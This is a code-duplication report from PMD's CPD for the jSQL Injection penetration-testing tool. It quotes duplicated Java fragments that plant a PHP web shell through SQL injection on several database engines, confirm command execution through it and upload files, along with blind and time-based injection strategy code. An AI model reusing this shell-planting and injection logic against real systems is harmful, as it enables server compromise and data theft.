CPD Results
The following document contains the results of PMD's CPD 7.7.0.
Duplications
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitDerby.java | 59 |
| com/jsql/model/accessible/vendor/ExploitHsqldb.java | 60 |
nameTable, bodyExploit.replace("'", "''"),
nameTable,
pathExploit + nameExploit
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
String result = this.injectionModel.getResourceAccess().callCommand(
urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
);
if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
return StringUtils.EMPTY;
}
var request = new Request();
request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB);
request.setParameters(urlSuccess);
this.injectionModel.sendToViews(request);
return urlSuccess;
};
return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
String bodyExploit = StringUtil.base64Decode(
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getFile().getWrite(),
nameTable,
nameTable, bodyExploit.replace("'", "''"), | |
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitDerby.java | 94 |
| com/jsql/model/accessible/vendor/ExploitHsqldb.java | 94 |
nameTable, bodyExploit.replace("'", "''"),
nameTable,
pathExploit + nameExploit
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public String getRead(String pathFile) throws AbstractSlidingException {
LOGGER.log(LogLevelUtil.CONSOLE_INFORM, CallableFile.REQUIRE_STACK);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
this.injectionModel.injectWithoutIndex(String.format(
this.injectionModel.getResourceAccess().getExploitDerby().getModelYaml().getFile().getCreateTable(), | |
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitDerby.java | 97 |
| com/jsql/model/accessible/vendor/ExploitSqlite.java | 128 |
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public String getRead(String pathFile) throws AbstractSlidingException {
LOGGER.log(LogLevelUtil.CONSOLE_INFORM, CallableFile.REQUIRE_STACK); | |
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitH2.java | 138 |
| com/jsql/model/accessible/vendor/ExploitSqlite.java | 128 |
), ResourceAccess.TBL_DUMP);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public String getRead(String pathFile) throws AbstractSlidingException { | |
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitDerby.java | 62 |
| com/jsql/model/accessible/vendor/ExploitH2.java | 100 |
| com/jsql/model/accessible/vendor/ExploitHsqldb.java | 62 |
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
String result = this.injectionModel.getResourceAccess().callCommand(
urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
);
if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
return StringUtils.EMPTY;
}
var request = new Request();
request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB);
request.setParameters(urlSuccess);
this.injectionModel.sendToViews(request);
return urlSuccess;
};
return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
String bodyExploit = StringUtil.base64Decode(
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8); | |
| File | Line |
|---|---|
| com/jsql/util/bruter/Base16.java | 62 |
| com/jsql/util/bruter/Base16.java | 85 |
private static final byte[] UPPER_CASE_DECODE_TABLE = {
// 0 1 2 3 4 5 6 7 8 9 A B C D E F
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, -1, -1, -1, -1, -1, -1, // 30-3f 0-9
-1, 10, 11, 12, 13, 14, 15 // 40-46 A-F | |
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitDerby.java | 97 |
| com/jsql/model/accessible/vendor/ExploitH2.java | 138 |
| com/jsql/model/accessible/vendor/ExploitHsqldb.java | 96 |
| com/jsql/model/accessible/vendor/ExploitPostgres.java | 511 |
| com/jsql/model/accessible/vendor/ExploitSqlite.java | 128 |
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public String getRead(String pathFile) throws AbstractSlidingException { | |
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitH2.java | 100 |
| com/jsql/model/accessible/vendor/ExploitSqlite.java | 93 |
), ResourceAccess.TBL_DUMP);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
String result = this.injectionModel.getResourceAccess().callCommand(
urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
);
if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
return StringUtils.EMPTY;
}
var request = new Request();
request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB);
request.setParameters(urlSuccess);
this.injectionModel.sendToViews(request);
return urlSuccess;
};
return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
String bodyExploit = StringUtil.base64Decode(
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8); | |
| File | Line |
|---|---|
| com/jsql/model/injection/strategy/StrategyBlindBin.java | 44 |
| com/jsql/model/injection/strategy/StrategyBlindBit.java | 44 |
| com/jsql/model/injection/strategy/StrategyTime.java | 44 |
this.injectionModel.getMediatorVendor().getVendor().instance().getModelYaml().getStrategy().getBinary().getTest().getBin()
)) {
LOGGER.log(
LogLevelUtil.CONSOLE_INFORM,
AbstractStrategy.FORMAT_STRATEGY_NOT_IMPLEMENTED,
this.getName(),
this.injectionModel.getMediatorVendor().getVendor()
);
return;
}
this.checkInjection(BlindOperator.OR);
this.checkInjection(BlindOperator.AND);
this.checkInjection(BlindOperator.STACK);
this.checkInjection(BlindOperator.NO_MODE);
if (this.isApplicable) {
this.allow();
var requestMessageBinary = new Request();
requestMessageBinary.setMessage(Interaction.MESSAGE_BINARY);
requestMessageBinary.setParameters(this.injection.getInfoMessage());
this.injectionModel.sendToViews(requestMessageBinary);
} else {
this.unallow();
}
}
private void checkInjection(BlindOperator blindOperator) throws StoppedByUserSlidingException {
if (this.isApplicable) {
return;
}
LOGGER.log(
LogLevelUtil.CONSOLE_DEFAULT,
"{} [{}] with [{}]...",
() -> I18nUtil.valueByKey(AbstractStrategy.KEY_LOG_CHECKING_STRATEGY),
this::getName,
() -> blindOperator
);
this.injection = new InjectionBlindBin(this.injectionModel, blindOperator); | |
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitDerby.java | 62 |
| com/jsql/model/accessible/vendor/ExploitSqlite.java | 93 |
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
String result = this.injectionModel.getResourceAccess().callCommand(
urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
);
if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
return StringUtils.EMPTY;
}
var request = new Request();
request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB);
request.setParameters(urlSuccess);
this.injectionModel.sendToViews(request);
return urlSuccess;
};
return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
String bodyExploit = StringUtil.base64Decode(
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8); | |
| File | Line |
|---|---|
| com/jsql/model/injection/strategy/StrategyBlindBin.java | 82 |
| com/jsql/model/injection/strategy/StrategyBlindBit.java | 82 |
this.injection = new InjectionBlindBin(this.injectionModel, blindOperator);
this.isApplicable = this.injection.isInjectable();
if (this.isApplicable) {
LOGGER.log(
LogLevelUtil.CONSOLE_SUCCESS,
"{} [{}] injection with [{}]",
() -> I18nUtil.valueByKey(AbstractStrategy.KEY_LOG_VULNERABLE),
this::getName,
() -> blindOperator
);
}
}
@Override
public void allow(int... i) {
this.injectionModel.appendAnalysisReport(
StringUtil.formatReport(LogLevelUtil.COLOR_BLU, "### Strategy: " + this.getName())
+ this.injectionModel.getReportWithoutIndex(
this.injectionModel.getMediatorVendor().getVendor().instance().sqlTestBlindWithOperator(
this.injectionModel.getMediatorVendor().getVendor().instance().sqlBlind(StringUtil.formatReport(LogLevelUtil.COLOR_GREEN, "<query>"), "0", true),
this.injection.getBlindOperator()
),
"metadataInjectionProcess",
null
)
);
this.markVulnerability(Interaction.MARK_BLIND_BIN_VULNERABLE); | |
| File | Line |
|---|---|
| com/jsql/model/injection/strategy/blind/InjectionCharInsertion.java | 95 |
| com/jsql/model/injection/strategy/blind/InjectionVendor.java | 70 |
List<Future<CallableCharInsertion>> listTagTrue = taskExecutor.invokeAll(listCallableTagTrue);
this.injectionModel.getMediatorUtils().getThreadUtil().shutdown(taskExecutor);
for (var i = 1 ; i < listTagTrue.size() ; i++) {
if (this.injectionModel.isStoppedByUser()) {
return;
}
if (this.constantTrueMark.isEmpty()) {
this.constantTrueMark = listTagTrue.get(i).get().getOpcodes();
} else {
this.constantTrueMark.retainAll(listTagTrue.get(i).get().getOpcodes());
}
}
} catch (ExecutionException e) {
LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, e);
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
}
this.initFalseMarks(); | |
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitPostgres.java | 409 |
| com/jsql/model/accessible/vendor/ExploitPostgres.java | 468 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
this.modelYaml.getFile().getWrite().getLargeObject().getFromText(),
bodyExploit.replace("'", "\"")
), ResourceAccess.ADD_LOID);
if (StringUtils.isEmpty(loid)) {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.LOID_NOT_FOUND);
return StringUtils.EMPTY;
}
var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
this.injectionModel.getResourceAccess().getResultWithCatch(String.format(
this.modelYaml.getFile().getWrite().getLargeObject().getToFile(),
loid,
pathExploit + nameExploit
), ResourceAccess.WRITE_LOID); | |
| File | Line |
|---|---|
| com/jsql/model/injection/strategy/blind/InjectionBlindBin.java | 81 |
| com/jsql/model/injection/strategy/blind/InjectionBlindBit.java | 75 |
for (Future<CallableBlindBin> futureFalsy: futuresFalsys) {
if (this.injectionModel.isStoppedByUser()) {
return;
}
if (this.falseDiffs.isEmpty()) {
this.falseDiffs = futureFalsy.get().getDiffsWithReference(); // Init diffs
} else {
this.falseDiffs.retainAll(futureFalsy.get().getDiffsWithReference()); // Clean un-matching diffs
}
}
} catch (ExecutionException e) {
LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, e);
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
}
if (this.injectionModel.isStoppedByUser()) {
return;
}
this.cleanTrueDiffs(injectionModel, blindOperator);
}
private void cleanTrueDiffs(InjectionModel injectionModel, BlindOperator blindOperator) {
ExecutorService taskExecutor = this.injectionModel.getMediatorUtils().getThreadUtil().getExecutor("CallableGetBlindBinTagTrue"); | |
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitDerby.java | 99 |
| com/jsql/model/accessible/vendor/ExploitMysql.java | 102 |
| com/jsql/model/accessible/vendor/ExploitPostgres.java | 513 |
| com/jsql/model/accessible/vendor/ExploitSqlite.java | 130 |
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); | |
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitH2.java | 140 |
| com/jsql/model/accessible/vendor/ExploitMysql.java | 102 |
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); | |
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitHsqldb.java | 98 |
| com/jsql/model/accessible/vendor/ExploitMysql.java | 102 |
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
try (InputStream streamToUpload = new FileInputStream(fileToUpload)) {
HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload);
if (result.body().contains(DataAccess.LEAD +"y")) {
LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName());
} else {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName());
}
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
} catch (IOException | JSqlException e) {
throw new JSqlRuntimeException(e);
}
return urlSuccess;
};
this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); | |
| File | Line |
|---|---|
| com/jsql/model/injection/strategy/StrategyBlindBin.java | 113 |
| com/jsql/model/injection/strategy/StrategyBlindBit.java | 113 |
this.markVulnerability(Interaction.MARK_BLIND_BIN_INVULNERABLE);
}
@Override
public String inject(String sqlQuery, String startPosition, AbstractSuspendable stoppable, String metadataInjectionProcess) throws StoppedByUserSlidingException {
return this.injection.inject(
this.injectionModel.getMediatorVendor().getVendor().instance().sqlBlind(sqlQuery, startPosition, false),
stoppable
);
}
@Override
public void activateWhenApplicable() {
if (this.injectionModel.getMediatorStrategy().getStrategy() == null && this.isApplicable()) {
LOGGER.log(
LogLevelUtil.CONSOLE_INFORM,
"{} [{}] with [{}]",
() -> I18nUtil.valueByKey("LOG_USING_STRATEGY"),
this::getName,
() -> this.injection.getBlindOperator().name()
);
this.injectionModel.getMediatorStrategy().setStrategy(this);
var request = new Request();
request.setMessage(Interaction.MARK_BLIND_BIN_STRATEGY); | |
| File | Line |
|---|---|
| com/jsql/util/bruter/Base16.java | 64 |
| com/jsql/util/bruter/Base16.java | 87 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f | |
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitH2.java | 84 |
| com/jsql/model/accessible/vendor/ExploitH2.java | 122 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getRce().getCreateTable(),
nameTable,
nameTable, bodyExploit.replace("'", "\"")
), ResourceAccess.TBL_CREATE);
var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getRce().getScriptSimple(),
pathExploit + nameExploit,
nameTable
), ResourceAccess.TBL_DUMP);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { | |
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitDerby.java | 41 |
| com/jsql/model/accessible/vendor/ExploitHsqldb.java | 42 |
ModelYamlDerby.class
);
}
public String createWeb(String pathExploit, String urlExploit) {
LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE Web target requirements: stack query, web+db on same machine, jdbc bridge");
String bodyExploit = StringUtil.base64Decode(
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getFile().getWrite(),
nameTable,
nameTable, bodyExploit.replace("'", "''"), | |
| File | Line |
|---|---|
| com/jsql/model/injection/strategy/blind/InjectionBlindBin.java | 124 |
| com/jsql/model/injection/strategy/blind/InjectionBlindBit.java | 117 |
for (Future<CallableBlindBin> futureTruthy: futuresTruthys) {
if (this.injectionModel.isStoppedByUser()) {
return;
}
if (this.trueDiffs.isEmpty()) {
this.trueDiffs = futureTruthy.get().getDiffsWithReference(); // Init diffs
} else {
this.trueDiffs.retainAll(futureTruthy.get().getDiffsWithReference()); // Clean un-matching diffs
}
this.falseDiffs.removeAll(futureTruthy.get().getDiffsWithReference());
}
} catch (ExecutionException e) {
LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, e);
} catch (InterruptedException e) {
LOGGER.log(LogLevelUtil.IGNORE, e, e);
Thread.currentThread().interrupt();
}
}
@Override
public CallableBlindBin getCallableBitTest(String sqlQuery, int indexChar, int bit) { | |
| File | Line |
|---|---|
| com/jsql/model/injection/strategy/blind/InjectionCharInsertion.java | 173 |
| com/jsql/model/injection/strategy/blind/InjectionVendor.java | 137 |
);
try {
blindTest.call();
} catch (Exception e) {
LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, e);
}
return blindTest.isTrue() && !this.constantTrueMark.isEmpty();
}
public String callUrl(String urlString, String metadataInjectionProcess) {
return this.injectionModel.injectWithoutIndex(urlString, metadataInjectionProcess);
}
public String callUrl(String urlString, String metadataInjectionProcess, AbstractCallableBit<?> callableBoolean) {
return this.injectionModel.injectWithoutIndex(urlString, metadataInjectionProcess, callableBoolean);
}
// Getter
public String getBlankFalseMark() {
return this.blankFalseMark;
}
public List<Diff> getConstantTrueMark() {
return this.constantTrueMark;
}
} | |
| File | Line |
|---|---|
| com/jsql/util/bruter/Base16.java | 64 |
| com/jsql/util/bruter/Base16.java | 90 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f | |
| File | Line |
|---|---|
| com/jsql/util/bruter/Base16.java | 87 |
| com/jsql/util/bruter/Base16.java | 90 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f | |
| File | Line |
|---|---|
| com/jsql/util/bruter/Base16.java | 64 |
| com/jsql/util/bruter/Base16.java | 90 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f | |
| File | Line |
|---|---|
| com/jsql/util/bruter/Base16.java | 87 |
| com/jsql/util/bruter/Base16.java | 90 |
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 00-0f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 10-1f
-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, // 20-2f | |
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitDerby.java | 62 |
| com/jsql/model/accessible/vendor/ExploitPostgres.java | 427 |
| com/jsql/model/accessible/vendor/ExploitSqlite.java | 93 |
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> {
String result = this.injectionModel.getResourceAccess().callCommand(
urlSuccess +"?c="+ ResourceAccess.WEB_CONFIRM_CMD
);
if (!result.contains(ResourceAccess.WEB_CONFIRM_RESULT)) {
LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
return StringUtils.EMPTY;
}
var request = new Request();
request.setMessage(Interaction.ADD_TAB_EXPLOIT_WEB);
request.setParameters(urlSuccess);
this.injectionModel.sendToViews(request);
return urlSuccess;
};
return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
}
public void createUpload(String pathExploit, String urlExploit, File fileToUpload) { | |
| File | Line |
|---|---|
| com/jsql/model/injection/strategy/StrategyBlindBin.java | 82 |
| com/jsql/model/injection/strategy/StrategyTime.java | 82 |
this.injection = new InjectionBlindBin(this.injectionModel, blindOperator);
this.isApplicable = this.injection.isInjectable();
if (this.isApplicable) {
LOGGER.log(
LogLevelUtil.CONSOLE_SUCCESS,
"{} [{}] injection with [{}]",
() -> I18nUtil.valueByKey(AbstractStrategy.KEY_LOG_VULNERABLE),
this::getName,
() -> blindOperator
);
}
}
@Override
public void allow(int... i) {
this.injectionModel.appendAnalysisReport(
StringUtil.formatReport(LogLevelUtil.COLOR_BLU, "### Strategy: " + this.getName())
+ this.injectionModel.getReportWithoutIndex(
this.injectionModel.getMediatorVendor().getVendor().instance().sqlTestBlindWithOperator( | |
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitDerby.java | 49 |
| com/jsql/model/accessible/vendor/ExploitDerby.java | 84 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
.replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL);
var nameTable = RandomStringUtils.secure().nextAlphabetic(8);
var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php";
this.injectionModel.injectWithoutIndex(String.format(
this.modelYaml.getFile().getWrite(),
nameTable,
nameTable, bodyExploit.replace("'", "''"),
nameTable,
pathExploit + nameExploit
), ResourceAccess.TBL_CREATE);
BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { | |
| File | Line |
|---|---|
| com/jsql/model/accessible/vendor/ExploitHsqldb.java | 50 |
| com/jsql/model/accessible/vendor/ExploitHsqldb.java | 84 |
this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_WEB)
)
.replace(DataAccess.SHELL_LEAD, DataAccess.LEAD)
